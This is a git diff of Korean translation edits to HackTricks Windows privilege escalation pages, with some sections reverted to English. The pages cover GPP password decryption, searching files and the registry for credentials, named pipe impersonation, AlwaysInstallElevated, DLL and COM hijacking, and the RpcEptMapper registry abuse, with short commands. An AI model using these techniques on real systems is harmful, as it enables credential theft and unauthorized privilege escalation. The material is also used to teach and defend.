+이전에는 Group Policy Preferences (GPP)를 통해 여러 머신에 사용자 정의 로컬 관리자 계정을 배포할 수 있는 기능이 제공되었습니다. 그러나 이 방법에는 심각한 보안 결함이 있었습니다. 첫째, SYSVOL에 XML 파일로 저장된 Group Policy Objects (GPOs)는 모든 도메인 사용자가 접근할 수 있었습니다. 둘째, 공개적으로 문서화된 기본 키를 사용하여 AES256으로 암호화된 이 GPP 내의 비밀번호는 인증된 사용자가 복호화할 수 있었습니다. 이는 사용자가 권한 상승을 할 수 있는 심각한 위험을 초래했습니다.
 
-이 위험을 완화하기 위해, 비어 있지 않은 "cpassword" 필드를 포함하는 로컬 캐시 GPP 파일을 스캔하는 기능이 개발되었습니다. 이러한 파일을 찾으면, 해당 기능은 비밀번호를 복호화하고 사용자 정의 PowerShell 객체를 반환합니다. 이 객체에는 GPP에 대한 세부정보와 파일의 위치가 포함되어 있어 이 보안 취약점을 식별하고 수정하는 데 도움이 됩니다.
+이 위험을 완화하기 위해, 비어 있지 않은 "cpassword" 필드를 포함하는 로컬 캐시된 GPP 파일을 스캔하는 기능이 개발되었습니다. 이러한 파일을 찾으면, 이 기능은 비밀번호를 복호화하고 사용자 정의 PowerShell 객체를 반환합니다. 이 객체에는 GPP에 대한 세부정보와 파일의 위치가 포함되어 있어 이 보안 취약점을 식별하고 수정하는 데 도움이 됩니다.
 
 다음 파일을 위해 `C:\ProgramData\Microsoft\Group Policy\history` 또는 _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (W Vista 이전)_에서 검색하세요:
 
@@ -1014,7 +1014,7 @@ C:\inetpub\wwwroot\web.config
 Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
 Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
 ```
-웹.config의 자격 증명 예:
+credentials가 포함된 web.config의 예:
 ```xml
 <authentication mode="Forms">
 <forms name="login" loginUrl="/admin">
@@ -1209,7 +1209,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /d
 
 [**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **는 msf** 플러그인으로, 이 플러그인은 **희생자의 자격 증명을 검색하는 모든 metasploit POST 모듈을 자동으로 실행하기 위해 생성되었습니다.**\
 [**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) 는 이 페이지에 언급된 비밀번호가 포함된 모든 파일을 자동으로 검색합니다.\
-[**Lazagne**](https://github.com/AlessandroZ/LaZagne) 은 시스템에서 비밀번호를 추출하는 또 다른 훌륭한 도구입니다.
+[**Lazagne**](https://github.com/AlessandroZ/LaZagne) 는 시스템에서 비밀번호를 추출하는 또 다른 훌륭한 도구입니다.
 
 도구 [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) 는 **세션**, **사용자 이름** 및 **비밀번호**를 검색하며, 여러 도구가 이 데이터를 일반 텍스트로 저장합니다 (PuTTY, WinSCP, FileZilla, SuperPuTTY, 및 RDP).
 ```bash
@@ -1218,28 +1218,28 @@ Invoke-SessionGopher -Thorough
 Invoke-SessionGopher -AllDomain -o
 Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
 ```
-## Leaked Handlers
+## 누출된 핸들
 
 Imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also create a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\
 Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.\
 [Read this example for more information about **how to detect and exploit this vulnerability**.](leaked-handle-exploitation.md)\
 [Read this **other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access)**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/).
 
-## Named Pipe Client Impersonation
+## 명명된 파이프 클라이언트 가장
 
-공유 메모리 세그먼트, 즉 **파이프**는 프로세스 간 통신 및 데이터 전송을 가능하게 합니다.
+Shared memory segments, referred to as **pipes**, enable process communication and data transfer.
 
-Windows는 **Named Pipes**라는 기능을 제공하여 관련 없는 프로세스가 서로 다른 네트워크를 통해서도 데이터를 공유할 수 있게 합니다. 이는 **named pipe server**와 **named pipe client**로 정의된 역할을 가진 클라이언트/서버 아키텍처와 유사합니다.
+Windows provides a feature called **Named Pipes**, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as **named pipe server** and **named pipe client**.
 
-**클라이언트**가 파이프를 통해 데이터를 전송할 때, 파이프를 설정한 **서버**는 필요한 **SeImpersonate** 권한이 있는 경우 **클라이언트의 신원을 취할 수 있는** 능력을 가집니다. 파이프를 통해 통신하는 **특권 프로세스**를 식별하고 이를 모방할 수 있는 기회를 제공하여, 해당 프로세스가 설정한 파이프와 상호작용할 때 그 프로세스의 신원을 채택함으로써 **더 높은 권한을 얻을 수 있는** 기회를 제공합니다. 이러한 공격을 실행하는 방법에 대한 지침은 [**여기**](named-pipe-client-impersonation.md)와 [**여기**](./#from-high-integrity-to-system)에서 찾을 수 있습니다.
+When data is sent through a pipe by a **client**, the **server** that set up the pipe has the ability to **take on the identity** of the **client**, assuming it has the necessary **SeImpersonate** rights. Identifying a **privileged process** that communicates via a pipe you can mimic provides an opportunity to **gain higher privileges** by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found [**here**](named-pipe-client-impersonation.md) and [**here**](./#from-high-integrity-to-system).
 
-또한 다음 도구는 **burp와 같은 도구로 named pipe 통신을 가로챌 수 있게 해줍니다:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **그리고 이 도구는 모든 파이프를 나열하고 볼 수 있게 해주어 privescs를 찾는 데 도움을 줍니다** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer)
+Also the following tool allows to **intercept a named pipe communication with a tool like burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **and this tool allows to list and see all the pipes to find privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer)
 
-## Misc
+## 기타
 
-### **Monitoring Command Lines for passwords**
+### **비밀번호에 대한 명령줄 모니터링**
 
-사용자로서 쉘을 얻을 때, 자격 증명을 **명령줄에 전달하는** 예약된 작업이나 다른 프로세스가 실행될 수 있습니다. 아래 스크립트는 프로세스 명령줄을 2초마다 캡처하고 현재 상태를 이전 상태와 비교하여 차이점을 출력합니다.
+When getting a shell as a user, there may be scheduled tasks or other processes being executed which **pass credentials on the command line**. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
 ```powershell
 while($true)
 {
@@ -1251,7 +1251,7 @@ Compare-Object -ReferenceObject $process -DifferenceObject $process2
 ```
 ## 프로세스에서 비밀번호 훔치기
 
-## 낮은 권한 사용자에서 NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC 우회
+## 낮은 권한 사용자에서 NT\AUTHORITY SYSTEM으로 (CVE-2019-1388) / UAC 우회
 
 그래픽 인터페이스(콘솔 또는 RDP를 통해)에 접근할 수 있고 UAC가 활성화된 경우, 일부 버전의 Microsoft Windows에서는 비권한 사용자로부터 "NT\AUTHORITY SYSTEM"과 같은 터미널이나 다른 프로세스를 실행할 수 있습니다.
 
@@ -1326,7 +1326,7 @@ sc start newservicename
 ```
 ### AlwaysInstallElevated
 
-High Integrity 프로세스에서 **AlwaysInstallElevated 레지스트리 항목을 활성화**하고 **역방향 셸을 설치**할 수 있습니다 _**.msi**_ 래퍼를 사용하여.\
+High Integrity 프로세스에서 **AlwaysInstallElevated 레지스트리 항목을 활성화**하고 **역방향 셸을 설치**하려고 시도할 수 있습니다 _**.msi**_ 래퍼를 사용하여.\
 [레지스트리 키와 _.msi_ 패키지를 설치하는 방법에 대한 더 많은 정보는 여기에서 확인하세요.](./#alwaysinstallelevated)
 
 ### High + SeImpersonate 권한을 System으로
@@ -1343,11 +1343,11 @@ High Integrity 프로세스에서 **AlwaysInstallElevated 레지스트리 항목
 
 이 기술은 meterpreter가 `getsystem`에서 상승하는 데 사용됩니다. 이 기술은 **파이프를 생성한 다음 해당 파이프에 쓰기 위해 서비스를 생성/악용하는 것**으로 구성됩니다. 그런 다음, **파이프를 생성한 서버**는 **`SeImpersonate`** 권한을 사용하여 **파이프 클라이언트(서비스)의 토큰을 가장할 수 있습니다**.\
 이름 파이프에 대해 [**더 알고 싶다면 이 글을 읽어야 합니다**](./#named-pipe-client-impersonation).\
-이름 파이프를 사용하여 높은 무결성에서 System으로 가는 방법에 대한 [**예제를 읽고 싶다면 이 글을 읽어야 합니다**](from-high-integrity-to-system-with-name-pipes.md).
+이름 파이프를 사용하여 **높은 무결성에서 System으로 가는 방법에 대한 예제를 읽고 싶다면 이 글을 읽어야 합니다**](from-high-integrity-to-system-with-name-pipes.md).
 
 ### Dll Hijacking
 
-**SYSTEM**으로 실행 중인 **프로세스**에 의해 **로드되는 dll을 하이재킹**하는 데 성공하면 해당 권한으로 임의의 코드를 실행할 수 있습니다. 따라서 Dll Hijacking은 이러한 종류의 권한 상승에도 유용하며, 더욱이 **높은 무결성 프로세스에서 달성하기가 훨씬 더 쉽습니다**. 이는 **dll을 로드하는 데 사용되는 폴더에 대한 쓰기 권한을 가지기 때문입니다**.\
+**SYSTEM**으로 실행 중인 **프로세스**에 의해 **로드되는 dll을 하이재킹**하는 데 성공하면 해당 권한으로 임의의 코드를 실행할 수 있습니다. 따라서 Dll Hijacking은 이러한 종류의 권한 상승에도 유용하며, 게다가 **높은 무결성 프로세스에서 달성하기가 훨씬 더 쉽습니다**. 이는 **dll을 로드하는 데 사용되는 폴더에 대한 쓰기 권한**을 가지기 때문입니다.\
 **Dll 하이재킹에 대해** [**더 알고 싶다면 여기에서 확인하세요**](dll-hijacking/)**.**
 
 ### **Administrator 또는 Network Service에서 System으로**
@@ -1383,7 +1383,7 @@ High Integrity 프로세스에서 **AlwaysInstallElevated 레지스트리 항목
 **Exe**
 
 [**Watson**](https://github.com/rasta-mouse/Watson) -- 알려진 privesc 취약점 검색 (VisualStudio를 사용하여 컴파일해야 함) ([**미리 컴파일된**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
-[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- 잘못된 구성을 검색하기 위해 호스트를 열거합니다 (정보 수집 도구에 가깝고 privesc보다 더 많은) (컴파일 필요) **(**[**미리 컴파일된**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
+[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- 잘못된 구성을 검색하기 위해 호스트를 열거합니다 (privesc보다 정보 수집 도구에 가깝습니다) (컴파일 필요) **(**[**미리 컴파일된**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
 [**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- 많은 소프트웨어에서 자격 증명을 추출합니다 (github에 미리 컴파일된 exe)**\
 [**SharpUP**](https://github.com/GhostPack/SharpUp) **-- PowerUp의 C# 포트**\
 [~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- 잘못된 구성 확인 (github에 미리 컴파일된 실행 파일). 권장하지 않음. Win10에서 잘 작동하지 않음.\
@@ -1402,7 +1402,7 @@ High Integrity 프로세스에서 **AlwaysInstallElevated 레지스트리 항목
 
 _multi/recon/local_exploit_suggestor_
 
-프로젝트를 올바른 버전의 .NET을 사용하여 컴파일해야 합니다 ([이것을 참조하세요](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). 피해자 호스트에 설치된 .NET 버전을 확인하려면 다음을 수행할 수 있습니다:
+프로젝트를 올바른 버전의 .NET을 사용하여 컴파일해야 합니다 ([이것을 참조하세요](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). 피해자 호스트에 설치된 .NET 버전을 보려면 다음을 수행할 수 있습니다:
 ```
 C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
 ```
diff --git a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
index 27fa84339..d731ef699 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
@@ -76,7 +76,7 @@ runas /user:domain\username /netonly cmd.exe
 
 사용 가능한 두 가지 유형의 토큰이 있습니다:
 
-- **Primary Token**: 프로세스의 보안 자격 증명을 나타내는 역할을 합니다. 기본 토큰을 프로세스와 생성 및 연결하는 작업은 권한 상승이 필요한 작업으로, 권한 분리 원칙을 강조합니다. 일반적으로 인증 서비스가 토큰 생성을 담당하고, 로그온 서비스가 사용자 운영 체제 셸과의 연결을 처리합니다. 프로세스는 생성 시 부모 프로세스의 기본 토큰을 상속받는다는 점도 주목할 만합니다.
+- **Primary Token**: 프로세스의 보안 자격 증명을 나타냅니다. 기본 토큰을 프로세스와 생성 및 연결하는 작업은 상승된 권한이 필요하며, 권한 분리 원칙을 강조합니다. 일반적으로 인증 서비스가 토큰 생성을 담당하고, 로그온 서비스가 사용자 운영 체제 셸과의 연결을 처리합니다. 프로세스는 생성 시 부모 프로세스의 기본 토큰을 상속받는다는 점도 주목할 가치가 있습니다.
 - **Impersonation Token**: 서버 애플리케이션이 클라이언트의 신원을 일시적으로 채택하여 보안 객체에 접근할 수 있도록 합니다. 이 메커니즘은 네 가지 운영 수준으로 나뉩니다:
   - **Anonymous**: 식별되지 않은 사용자와 유사한 서버 접근을 허용합니다.
   - **Identification**: 서버가 객체 접근을 위해 클라이언트의 신원을 사용하지 않고 확인할 수 있도록 합니다.
@@ -85,11 +85,11 @@ runas /user:domain\username /netonly cmd.exe
 
 #### Impersonate Tokens
 
-메타스플로잇의 _**incognito**_ 모듈을 사용하면 충분한 권한이 있는 경우 다른 **tokens**를 쉽게 **목록화**하고 **가장**할 수 있습니다. 이는 **다른 사용자처럼 행동하는 작업을 수행하는 데 유용할 수 있습니다**. 이 기술로 **권한 상승**도 할 수 있습니다.
+메타스플로잇의 _**incognito**_ 모듈을 사용하면 충분한 권한이 있는 경우 다른 **tokens**를 쉽게 **목록화**하고 **가장**할 수 있습니다. 이는 **다른 사용자인 것처럼 행동하는 작업을 수행하는 데 유용할 수 있습니다**. 이 기술로 **권한 상승**도 할 수 있습니다.
 
 ### Token Privileges
 
-어떤 **토큰 권한이 권한 상승을 위해 악용될 수 있는지 알아보세요:**
+어떤 **토큰 권한이 권한 상승에 악용될 수 있는지 알아보세요:**
 
 {{#ref}}
 privilege-escalation-abusing-tokens.md
diff --git a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index 499b2234b..a1e2191fa 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -4,7 +4,7 @@
 
 ## **Access Control List (ACL)**
 
-액세스 제어 목록(ACL)은 객체 및 해당 속성에 대한 보호를 지시하는 액세스 제어 항목(ACE)의 정렬된 집합으로 구성됩니다. 본질적으로 ACL은 특정 객체에 대해 어떤 보안 주체(사용자 또는 그룹)의 어떤 작업이 허용되거나 거부되는지를 정의합니다.
+액세스 제어 목록(ACL)은 객체 및 해당 속성에 대한 보호를 지시하는 액세스 제어 항목(ACE)의 정렬된 집합으로 구성됩니다. 본질적으로 ACL은 특정 객체에 대해 어떤 보안 주체(사용자 또는 그룹)의 어떤 행동이 허용되거나 거부되는지를 정의합니다.
 
 ACL에는 두 가지 유형이 있습니다:
 
@@ -34,8 +34,8 @@ ACL에는 두 가지 유형이 있습니다:
 
 **세 가지 주요 유형의 액세스 제어 항목(ACE)**이 있습니다:
 
-- **Access Denied ACE**: 이 ACE는 특정 사용자 또는 그룹( DACL에서)에게 객체에 대한 액세스를 명시적으로 거부합니다.
-- **Access Allowed ACE**: 이 ACE는 특정 사용자 또는 그룹( DACL에서)에게 객체에 대한 액세스를 명시적으로 허용합니다.
+- **Access Denied ACE**: 이 ACE는 특정 사용자 또는 그룹에 대해 객체에 대한 액세스를 명시적으로 거부합니다( DACL에서).
+- **Access Allowed ACE**: 이 ACE는 특정 사용자 또는 그룹에 대해 객체에 대한 액세스를 명시적으로 허용합니다( DACL에서).
 - **System Audit ACE**: 시스템 액세스 제어 목록(SACL) 내에 위치하며, 이 ACE는 사용자 또는 그룹이 객체에 접근 시도할 때 감사 로그를 생성하는 역할을 합니다. 액세스가 허용되었는지 또는 거부되었는지와 액세스의 성격을 문서화합니다.
 
 각 ACE는 **네 가지 중요한 구성 요소**를 가지고 있습니다:
@@ -58,15 +58,15 @@ ACL에는 두 가지 유형이 있습니다:
 이 ACE를 정리하는 최선의 방법은 **"정준 순서(canonical order)"**라고 불립니다. 이 방법은 모든 것이 원활하고 공정하게 작동하도록 보장하는 데 도움이 됩니다. **Windows 2000** 및 **Windows Server 2003**와 같은 시스템에 대한 방법은 다음과 같습니다:
 
 - 먼저, **이 항목을 위해 특별히 만들어진** 모든 규칙을 다른 곳에서 온 규칙(예: 부모 폴더)보다 먼저 배치합니다.
-- 이러한 특정 규칙에서는 **"아니오"(거부)**라고 말하는 규칙을 **"예"(허용)**라고 말하는 규칙보다 먼저 배치합니다.
-- 다른 곳에서 온 규칙의 경우, **가장 가까운 출처**(부모)에서 온 규칙부터 시작하고 그 뒤로 거슬러 올라갑니다. 다시 말해, **"아니오"**를 **"예"**보다 먼저 배치합니다.
+- 이러한 특정 규칙에서 **"아니오"(거부)**라고 말하는 규칙을 **"예"(허용)**라고 말하는 규칙보다 먼저 배치합니다.
+- 다른 곳에서 온 규칙의 경우, **가장 가까운 출처**(예: 부모)에서 온 규칙부터 시작하고 그 뒤로 거슬러 올라갑니다. 다시 말해, **"아니오"**를 **"예"**보다 먼저 배치합니다.
 
-이 설정은 두 가지 큰 방식으로 도움이 됩니다:
+이 설정은 두 가지 큰 이점을 제공합니다:
 
 - 특정 **"아니오"**가 있다면, 다른 **"예"** 규칙이 있더라도 존중됩니다.
-- 항목의 소유자가 최종적으로 누가 들어올 수 있는지를 결정할 수 있게 하여, 부모 폴더나 더 뒤에 있는 규칙이 적용되기 전에 결정할 수 있습니다.
+- 항목의 소유자가 최종적으로 누가 들어갈 수 있는지를 결정할 수 있습니다. 부모 폴더나 더 뒤에 있는 규칙이 적용되기 전에 말입니다.
 
-이렇게 함으로써 파일이나 폴더의 소유자는 누가 접근할 수 있는지에 대해 매우 정확하게 설정할 수 있어, 올바른 사람들이 들어올 수 있고 잘못된 사람들은 들어올 수 없도록 보장합니다.
+이렇게 함으로써 파일이나 폴더의 소유자는 누가 접근할 수 있는지에 대해 매우 정확하게 설정할 수 있으며, 올바른 사람들이 들어갈 수 있도록 하고 잘못된 사람들은 들어가지 못하도록 할 수 있습니다.
 
 ![](https://www.ntfs.com/images/screenshots/ACEs.gif)
 
@@ -98,20 +98,20 @@ ACL에는 두 가지 유형이 있습니다:
 
 #### 특정 그룹에 대한 액세스 거부
 
-Cost라는 이름의 폴더가 있고, 마케팅 팀을 제외한 모든 사람이 접근할 수 있도록 하려면, 규칙을 올바르게 설정하여 마케팅 팀이 명시적으로 거부된 후에 다른 모든 사람에게 허용되도록 할 수 있습니다. 이는 마케팅 팀에 대한 액세스를 거부하는 규칙을 모든 사람에게 허용하는 규칙보다 먼저 배치함으로써 이루어집니다.
+Cost라는 폴더가 있고, 마케팅 팀을 제외한 모든 사람이 접근할 수 있도록 하고 싶다고 가정해 보겠습니다. 규칙을 올바르게 설정함으로써, 마케팅 팀이 명시적으로 액세스를 거부받고 나서 다른 모든 사람에게 허용되도록 할 수 있습니다. 이는 마케팅 팀에 대한 액세스를 거부하는 규칙을 모든 사람에게 허용하는 규칙보다 먼저 배치함으로써 이루어집니다.
 
 #### 거부된 그룹의 특정 구성원에게 액세스 허용
 
-마케팅 팀이 일반적으로 접근할 수 없지만, 마케팅 이사인 Bob이 Cost 폴더에 접근해야 한다고 가정해 보겠습니다. Bob에게 액세스를 부여하는 특정 규칙(ACE)을 추가하고, 이를 마케팅 팀에 대한 액세스를 거부하는 규칙보다 먼저 배치할 수 있습니다. 이렇게 하면 Bob은 그의 팀에 대한 일반적인 제한에도 불구하고 접근할 수 있습니다.
+마케팅 팀이 일반적으로 접근할 수 없어도 마케팅 이사인 Bob이 Cost 폴더에 접근해야 한다고 가정해 보겠습니다. 우리는 Bob에게 액세스를 부여하는 특정 규칙(ACE)을 추가하고, 이를 마케팅 팀에 대한 액세스를 거부하는 규칙보다 먼저 배치할 수 있습니다. 이렇게 하면 Bob은 그의 팀에 대한 일반적인 제한에도 불구하고 액세스를 받을 수 있습니다.
 
 #### 액세스 제어 항목 이해하기
 
-ACE는 ACL의 개별 규칙입니다. 이들은 사용자 또는 그룹을 식별하고, 허용되거나 거부된 액세스를 지정하며, 이러한 규칙이 하위 항목에 어떻게 적용되는지를 결정합니다(상속). ACE에는 두 가지 주요 유형이 있습니다:
+ACE는 ACL의 개별 규칙입니다. 이들은 사용자 또는 그룹을 식별하고, 허용되거나 거부되는 액세스를 지정하며, 이러한 규칙이 하위 항목에 어떻게 적용되는지를 결정합니다(상속). ACE에는 두 가지 주요 유형이 있습니다:
 
 - **일반 ACE**: 이러한 ACE는 광범위하게 적용되며, 모든 유형의 객체에 영향을 미치거나 컨테이너(폴더)와 비컨테이너(파일) 간의 구분만 합니다. 예를 들어, 사용자가 폴더의 내용을 볼 수 있지만 그 안의 파일에 접근할 수 없는 규칙입니다.
 - **객체 특정 ACE**: 이러한 ACE는 보다 정밀한 제어를 제공하며, 특정 유형의 객체 또는 객체 내의 개별 속성에 대한 규칙을 설정할 수 있습니다. 예를 들어, 사용자 디렉토리에서 사용자가 자신의 전화번호는 업데이트할 수 있지만 로그인 시간은 업데이트할 수 없는 규칙이 있을 수 있습니다.
 
-각 ACE는 규칙이 적용되는 대상(보안 식별자 또는 SID 사용), 규칙이 허용하거나 거부하는 내용(액세스 마스크 사용), 그리고 다른 객체에 어떻게 상속되는지를 포함하는 중요한 정보를 포함합니다.
+각 ACE는 규칙이 적용되는 대상(보안 식별자 또는 SID 사용), 규칙이 허용하거나 거부하는 내용(액세스 마스크 사용), 그리고 다른 객체에 의해 어떻게 상속되는지를 포함하는 중요한 정보를 포함합니다.
 
 #### ACE 유형 간의 주요 차이점
 
@@ -134,14 +134,14 @@ ACE는 ACL의 개별 규칙입니다. 이들은 사용자 또는 그룹을 식
 
 | Bit (Range) | Meaning                            | Description/Example                       |
 | ----------- | ---------------------------------- | ----------------------------------------- |
-| 0 - 15      | 객체 특정 액세스 권한           | 데이터 읽기, 실행, 데이터 추가           |
-| 16 - 22     | 표준 액세스 권한                  | 삭제, ACL 쓰기, 소유자 쓰기              |
-| 23          | 보안 ACL에 접근할 수 있음         |                                           |
-| 24 - 27     | 예약                              |                                           |
-| 28          | 일반 모든 권한(읽기, 쓰기, 실행) | 모든 하위 항목                           |
-| 29          | 일반 실행                         | 프로그램을 실행하는 데 필요한 모든 것   |
-| 30          | 일반 쓰기                         | 파일에 쓰는 데 필요한 모든 것           |
-| 31          | 일반 읽기                         | 파일을 읽는 데 필요한 모든 것           |
+| 0 - 15      | 객체 특정 액세스 권한      | 데이터 읽기, 실행, 데이터 추가           |
+| 16 - 22     | 표준 액세스 권한             | 삭제, ACL 쓰기, 소유자 쓰기            |
+| 23          | 보안 ACL에 접근할 수 있음            |                                           |
+| 24 - 27     | 예약                           |                                           |
+| 28          | 일반 모든 (읽기, 쓰기, 실행) | 모든 것 아래                          |
+| 29          | 일반 실행                    | 프로그램을 실행하는 데 필요한 모든 것 |
+| 30          | 일반 쓰기                      | 파일에 쓰는 데 필요한 모든 것   |
+| 31          | 일반 읽기                       | 파일을 읽는 데 필요한 모든 것       |
 
 ## References
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
index 8dd98d233..60ba02e2c 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
@@ -9,20 +9,20 @@
 - **`HKLM\SYSTEM\CurrentControlSet\Services\Dnscache`**
 - **`HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper`**
 
-**RpcEptMapper** 서비스의 권한을 **regedit GUI**를 사용하여 확인할 것을 제안했습니다. 특히 **고급 보안 설정** 창의 **유효한 권한** 탭을 통해 특정 사용자 또는 그룹에 부여된 권한을 평가할 수 있습니다. 이 접근 방식은 각 접근 제어 항목(ACE)을 개별적으로 검토할 필요 없이 권한을 평가할 수 있게 해줍니다.
+**RpcEptMapper** 서비스의 권한을 **regedit GUI**를 사용하여 확인할 것을 제안했습니다. 특히 **고급 보안 설정** 창의 **유효한 권한** 탭을 통해 특정 사용자 또는 그룹에 부여된 권한을 개별적으로 각 접근 제어 항목(ACE)을 검토할 필요 없이 평가할 수 있습니다.
 
-스크린샷에서는 낮은 권한의 사용자에게 할당된 권한이 보여졌으며, 그 중 **서브키 생성** 권한이 주목할 만했습니다. 이 권한은 **AppendData/AddSubdirectory**라고도 하며, 스크립트의 발견과 일치합니다.
+스크린샷은 낮은 권한의 사용자에게 할당된 권한을 보여주었으며, 그 중 **하위 키 생성** 권한이 주목할 만했습니다. 이 권한은 **AppendData/AddSubdirectory**라고도 하며, 스크립트의 발견과 일치합니다.
 
-특정 값을 직접 수정할 수는 없지만, 새로운 서브키를 생성할 수 있는 능력이 주목되었습니다. 예를 들어, **ImagePath** 값을 변경하려는 시도가 있었으나 접근 거부 메시지가 나타났습니다.
+특정 값을 직접 수정할 수는 없지만, 새로운 하위 키를 생성할 수 있는 능력이 주목되었습니다. 예를 들어, **ImagePath** 값을 변경하려는 시도가 있었으나 접근 거부 메시지가 나타났습니다.
 
-이러한 제한에도 불구하고, **RpcEptMapper** 서비스의 레지스트리 구조 내에서 기본적으로 존재하지 않는 **Performance** 서브키를 활용할 가능성을 통해 권한 상승의 잠재력이 확인되었습니다. 이는 DLL 등록 및 성능 모니터링을 가능하게 할 수 있습니다.
+이러한 제한에도 불구하고, **RpcEptMapper** 서비스의 레지스트리 구조 내에서 기본적으로 존재하지 않는 **Performance** 하위 키를 활용할 가능성을 통해 권한 상승의 잠재력이 확인되었습니다. 이는 DLL 등록 및 성능 모니터링을 가능하게 할 수 있습니다.
 
-**Performance** 서브키와 성능 모니터링을 위한 활용에 대한 문서가 참고되었고, 이를 바탕으로 개념 증명 DLL이 개발되었습니다. 이 DLL은 **OpenPerfData**, **CollectPerfData**, **ClosePerfData** 함수의 구현을 보여주며, **rundll32**를 통해 테스트하여 성공적으로 작동함을 확인했습니다.
+**Performance** 하위 키와 성능 모니터링을 위한 활용에 대한 문서가 참고되었고, 이를 바탕으로 개념 증명 DLL이 개발되었습니다. 이 DLL은 **OpenPerfData**, **CollectPerfData**, **ClosePerfData** 함수를 구현하는 것을 보여주었으며, **rundll32**를 통해 테스트하여 성공적으로 작동함을 확인했습니다.
 
-목표는 **RPC Endpoint Mapper 서비스**가 제작된 Performance DLL을 로드하도록 강제하는 것이었습니다. 관찰 결과, PowerShell을 통해 성능 데이터와 관련된 WMI 클래스 쿼리를 실행하면 로그 파일이 생성되어 **LOCAL SYSTEM** 컨텍스트에서 임의 코드를 실행할 수 있게 되어 권한이 상승했습니다.
+목표는 조작된 Performance DLL을 로드하도록 **RPC Endpoint Mapper 서비스**를 강제하는 것이었습니다. 관찰 결과, PowerShell을 통해 성능 데이터와 관련된 WMI 클래스 쿼리를 실행하면 로그 파일이 생성되어 **LOCAL SYSTEM** 컨텍스트에서 임의 코드를 실행할 수 있게 되어 권한이 상승했습니다.
 
 이 취약점의 지속성과 잠재적 영향이 강조되었으며, 이는 후속 공격 전략, 측면 이동 및 안티바이러스/EDR 시스템 회피와 관련이 있음을 나타냅니다.
 
-이 취약점은 처음에 스크립트를 통해 의도치 않게 공개되었지만, 그 악용은 구식 Windows 버전(예: **Windows 7 / Server 2008 R2**)에 제한되며 로컬 접근이 필요하다는 점이 강조되었습니다.
+이 취약점은 처음에 스크립트를 통해 의도치 않게 공개되었지만, 그 이용은 구식 Windows 버전(예: **Windows 7 / Server 2008 R2**)에 제한되며 로컬 접근이 필요하다는 점이 강조되었습니다.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
index 617affda2..d78ea2934 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
@@ -8,7 +8,7 @@ HKCU의 값은 사용자가 수정할 수 있으므로 **COM Hijacking**은 **
 
 - **RegOpenKey** 작업.
 - _결과_가 **NAME NOT FOUND**인 경우.
-- 그리고 _경로_가 **InprocServer32**로 끝나는 경우.
+- _경로_가 **InprocServer32**로 끝나는 경우.
 
 어떤 존재하지 않는 COM을 가장할지 결정한 후 다음 명령을 실행하십시오. _몇 초마다 로드되는 COM을 가장하기로 결정하면 과도할 수 있으니 주의하십시오._
 ```bash
@@ -72,6 +72,6 @@ Name                                   Property
 PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
